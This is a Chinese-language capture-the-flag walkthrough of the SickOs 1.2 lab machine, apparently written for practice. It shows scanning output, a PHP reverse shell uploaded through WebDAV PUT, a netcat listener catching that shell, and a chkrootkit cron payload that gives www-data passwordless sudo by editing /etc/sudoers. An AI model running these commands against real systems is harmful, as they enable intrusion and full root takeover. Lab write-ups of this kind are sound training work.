环境介绍:
名称:SickOs: 1.2
日期:2016年5月27日
作者:D4rk
系列:SickOs
说明:
这是来自SickOs的以下系列中的第二个并且独立于先前版本,挑战的范围是获得系统的最高权限。
信息搜集
获取目标
1
2
3
|
$ netdiscover -r 192.168.123.1/24
192.168.123.87 08:00:27:df:16:3b 1 60 PCS Systemtechnik GmbH
|
扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
$ nmap -A -p- 192.168.123.87
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-06 09:17 CST
Nmap scan report for ubuntu.lan (192.168.123.87)
Host is up (0.00097s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 66:8c:c0:f2:85:7c:6c:c0:f6🆎7d:48:04:81:c2:d4 (DSA)
| 2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_ 256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open http lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.31 seconds
|
目录
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
$ dirb http://192.168.123.87/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Sep 6 09:23:18 2019
URL_BASE: http://192.168.123.87/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.123.87/ ----
+ http://192.168.123.87/index.php (CODE:200|SIZE:163)
==> DIRECTORY: http://192.168.123.87/test/
---- Entering directory: http://192.168.123.87/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Fri Sep 6 09:23:20 2019
DOWNLOADED: 4612 - FOUND: 1
|
脆弱性扫描
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
$ nikto -h http://192.168.123.87/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.123.87
+ Target Hostname: 192.168.123.87
+ Target Port: 80
+ Start Time: 2019-09-06 09:23:30 (GMT8)
---------------------------------------------------------------------------
+ Server: lighttpd/1.4.28
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ All CGI directories 'found', use '-C none' to test none
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ 26545 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2019-09-06 09:24:43 (GMT8) (73 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
|
代码审计
view-source:http://192.168.123.87/test/
1
2
|
<div class="foot">lighttpd/1.4.28</div>
|
漏洞利用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
$ searchsploit lighttpd
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Lighttpd 1.4.15 - Multiple Code Execut | exploits/windows/remote/30322.rb
Lighttpd 1.4.16 - FastCGI Header Overf | exploits/multiple/remote/4391.c
Lighttpd 1.4.17 - FastCGI Header Overf | exploits/linux/remote/4437.c
Lighttpd 1.4.x - mod_userdir Informati | exploits/linux/remote/31396.txt
Lighttpd < 1.4.23 (BSD/Solaris) - Sour | exploits/multiple/remote/8786.txt
lighttpd - Denial of Service (PoC) | exploits/linux/dos/18295.txt
lighttpd 1.4.31 - Denial of Service (P | exploits/linux/dos/22902.sh
lighttpd 1.4/1.5 - Slow Request Handli | exploits/linux/dos/33591.sh
--------------------------------------- ----------------------------------------
Shellcodes: No Result
|
- 都是些提取拒绝服务什么的,不足以满足我们拿服务器的需求。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
$ curl -v -X OPTIONS http://192.168.123.87/test/
* Trying 192.168.123.87:80...
* TCP_NODELAY set
* Connected to 192.168.123.87 (192.168.123.87) port 80 (#0)
> OPTIONS /test/ HTTP/1.1
> Host: 192.168.123.87
> User-Agent: curl/7.65.3
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Allow: OPTIONS, GET, HEAD, POST
< Content-Length: 0
< Date: Fri, 06 Sep 2019 09:37:08 GMT
< Server: lighttpd/1.4.28
|
上传SHELL
$ curl --upload-file php-reverse-shell.php -v --url http://192.168.123.87/test/icekam.php -0 --http1.0
* Trying 192.168.123.87:80...
* TCP_NODELAY set
* Connected to 192.168.123.87 (192.168.123.87) port 80 (#0)
> PUT /test/icekam.php HTTP/1.0
> Host: 192.168.123.87
> User-Agent: curl/7.65.3
> Accept: */*
> Content-Length: 5496
>
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Content-Length: 0
< Connection: close
< Date: Fri, 06 Sep 2019 09:50:26 GMT
< Server: lighttpd/1.4.28
<
* Closing connection 0
1
2
3
4
5
6
7
8
9
|
$ sudo nc -lvvp 443
$ curl "http://192.168.123.87/test/icekam.php"
listening on [any] 443 ...
connect to [192.168.123.160] from ubuntu.lan [192.168.123.87] 52529
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
02:52:48 up 17:41, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
|
提权
系统信息
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
$ cd /tmp
$ ls -la
total 8
drwxrwxrwt 2 root root 4096 Sep 6 02:54 .
drwxr-xr-x 22 root root 4096 Mar 30 2016 ..
srwxr-xr-x 1 www-data www-data 0 Sep 5 09:11 php.socket-0
$ uname -a
Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/tmp$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 12.04.4 LTS
Release: 12.04
Codename: precis
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
$ git clone https://github.com/rebootuser/LinEnum.git
正克隆到 'LinEnum'...
remote: Enumerating objects: 9, done.
remote: Counting objects: 100% (9/9), done.
remote: Compressing objects: 100% (9/9), done.
remote: Total 187 (delta 3), reused 0 (delta 0), pack-reused 178
接收对象中: 100% (187/187), 125.76 KiB | 270.00 KiB/s, 完成.
处理 delta 中: 100% (91/91), 完成.
## icekam @ Sec in /tmp [10:08:09]
$ cd LinEnum
## icekam @ Sec in /tmp/LinEnum on git:master o [10:08:11]
$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
|
1
2
3
4
5
|
-rw-r--r-- 1 root root 722 Jun 19 2012 /etc/crontab
www-data@ubuntu:/tmp$ ls -lah /etc/cron* 2>/dev/null | grep chkrootkit
ls -lah /etc/cron* 2>/dev/null | grep chkrootkit
-rwxr-xr-x 1 root root 2.0K Jun 4 2014 chkrootkit
|
crontab
可用,生成一个提权任务,等待时间自动触发。
1
|
echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
|
心得
这个姿势很骚,主要是定时任务提权。